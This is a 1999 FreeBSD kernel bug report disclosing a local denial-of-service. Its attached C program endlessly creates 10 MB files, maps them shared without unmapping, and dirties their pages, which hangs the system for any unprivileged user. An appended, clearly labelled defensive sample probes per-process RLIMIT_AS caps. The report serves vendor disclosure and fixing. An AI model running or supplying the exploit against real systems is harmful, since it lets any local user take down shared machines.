Date:      Sat, 30 Oct 1999 16:00:45 -0700 (PDT)
From:      sobomax@altavista.net
To:        freebsd-gnats-submit@freebsd.org
Subject:   kern/14614: VM DoS attack (with exploit attached)
Message-ID:  <19991030230045.F0D8014BF2@hub.freebsd.org>


>Number:         14614
>Category:       kern
>Synopsis:       VM DoS attack (with exploit attached)
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sat Oct 30 16:10:00 PDT 1999
>Closed-Date:
>Last-Modified:
>Originator:     Maxim Sobolev
>Release:        4.0-CURRENT, 3.3-STABLE
>Organization:
Vega International Capital
>Environment:
>Description:
Any unprivileged user with shell access and 10-20MB of disk quota
can hang a FreeBSD machine using the following program. This program is simply
mmap'ing large files without unmap'ing them. I have not found a way to
prevent this attack, either using disk quotas or using memory limits in
login.conf.

I have personally tested that it works on 4.0; however, others report that 3.3
is also affected.
>How-To-Repeat:
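#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    int fd;
    int i;
    int len=1024*1024*10;  /*ie 10Mbytes*/
    caddr_t addr;
    char ttt[80];

    for (i=0;;i++)
    {
        /* create a new file named after the loop counter */
        sprintf (ttt,"%d",i);
        fd=open(ttt,O_CREAT|O_RDWR,0666);
        if (fd<0)
        {
            printf("open error %d\n",errno);
            exit(1);
        }
        /* extend the file to len bytes by writing one byte at the end */
        lseek(fd,len-1,SEEK_SET);
        write(fd,"",1);
        /* map the file shared and writable; the mapping is never unmapped */
        addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
        if (addr==MAP_FAILED)
        {
            printf("mmap error %d\n",errno);
            exit(1);
        }
        close(fd);
        /* dirty every page of the mapping */
        memset(addr,'x',len);
    }
}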

>Fix:


>Release-Note:
>Audit-Trail:
>Unformatted:
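
A defensive counterpart to the report's description of mmap without munmap, added here as an example that is not part of the original message or of FreeBSD: a forked child caps its own address space with setrlimit(RLIMIT_AS) and counts how many file-backed MAP_SHARED mappings succeed before mmap is refused. It assumes a POSIX system that enforces RLIMIT_AS and a writable /tmp; the function names, the 1 MiB chunk and the 64 MiB cap are constructed for the illustration, and the report does not say whether such a limit existed on the affected releases.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

#define CHUNK (1024 * 1024)  /* 1 MiB per mapping (constructed value) */
#define MAX_MAPS 512         /* safety stop if no limit is enforced */

/* Child side: apply the cap, then map one sparse file repeatedly without
 * unmapping. Returns the number of mappings granted before mmap failed. */
static int map_until_refused(rlim_t cap_bytes)
{
    struct rlimit rl;
    char path[] = "/tmp/vmcapXXXXXX";   /* assumed writable temp directory */
    int fd, n = 0;

    if (getrlimit(RLIMIT_AS, &rl) != 0) return -1;
    rl.rlim_cur = cap_bytes < rl.rlim_max ? cap_bytes : rl.rlim_max;
    if (setrlimit(RLIMIT_AS, &rl) != 0) return -1;
    if ((fd = mkstemp(path)) < 0) return -1;
    unlink(path);                       /* file vanishes when fd is closed */
    if (ftruncate(fd, CHUNK) != 0) return -1;
    while (n < MAX_MAPS &&
           mmap(NULL, CHUNK, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0) != MAP_FAILED)
        n++;                            /* pages are never touched or dirtied */
    close(fd);
    return n;
}

/* Parent side: run the probe in a forked child so the cap never applies to
 * the caller, and read the count back over a pipe. Returns -1 on error. */
int mappings_allowed_under_cap(rlim_t cap_bytes)
{
    int p[2], n = -1;
    pid_t pid;
    if (pipe(p) != 0 || (pid = fork()) < 0) return -1;
    if (pid == 0) {
        n = map_until_refused(cap_bytes);
        _exit(write(p[1], &n, sizeof n) == (ssize_t)sizeof n ? 0 : 1);
    }
    close(p[1]);
    if (read(p[0], &n, sizeof n) != (ssize_t)sizeof n) n = -1;
    close(p[0]);
    waitpid(pid, NULL, 0);
    return n;
}

int main(void) { printf("%d\n", mappings_allowed_under_cap((rlim_t)64 * CHUNK)); return 0; }
```

The cap bounds a single process's mappings; it is a per-process limit and does not change how the kernel handles the dirty shared pages the report describes.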

